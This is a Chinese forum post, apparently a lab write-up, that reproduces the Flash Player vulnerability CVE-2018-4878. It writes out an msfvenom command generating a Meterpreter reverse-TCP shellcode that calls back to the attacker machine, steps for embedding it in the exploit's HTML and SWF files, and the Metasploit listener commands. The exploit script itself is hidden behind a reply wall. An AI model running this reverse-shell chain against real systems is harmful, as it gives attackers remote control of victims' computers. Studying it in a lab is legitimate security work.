Flash 0day漏洞(CVE-2018-4878)复现
前言这几天很忙,已经有两天没有更新文章了,最近CVE-2018-4878挺火的,还有群里的人也问这个怎么复现。今天就献丑复现一下,大表哥别喷,虽然我还没研究到这方面的漏洞分析,我会努力的,相信不久我也能写出二进制漏洞分析的文章。该漏洞影响 Flash Player 当前最新版本28.0.0.137以及之前的所有版本,而Adobe公司计划在当地时间2月5日紧急发布更新来修复此漏洞。从Adobe公告致谢来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KR-CERT)发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发起攻击。环境攻击机: kali 2018(192.168.59.6)靶机: Windows 10 x64 (192.168.59.160)
Web服务器: Windows 7 X64(192.168.59.127)复现过程
[*]我们先在kali生成一个python类型的shellcode
msfVENOM -p windows/meterpreter/reverse_tcp LHOST=192.168.59.6 LPORT=6666 -f p ython > /root/shellcode.txt
LHOST就是kali的ip地址,6666端口你可以随便设置,/root/shellcode.txt要生成的文件路径2.替换EXP里面的shellcode3.使用cve-2018-4878.py生成文件,我这里用的是Sublime Text 3 Ctrl+B运行python,会在本目录下生成两个文件index.html,exploit.swf4.然后把这两个文件放到Web服务器里面5.在kali的MSF里面设置监听msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.59.6msf exploit(handler) > set LPORT 6666msf exploit(handler) > exploit6.然后使用靶机的win10 IE访问Web服务器的文件index.htmlcve-2018-4878.py 代码**** Hidden Message *****
我来看看 牛p 隐藏内容请回复 看看这个洞咋样 未来研究下啊 我的版主该转正啦 回复看隐藏 {:3_131:}好腻害啊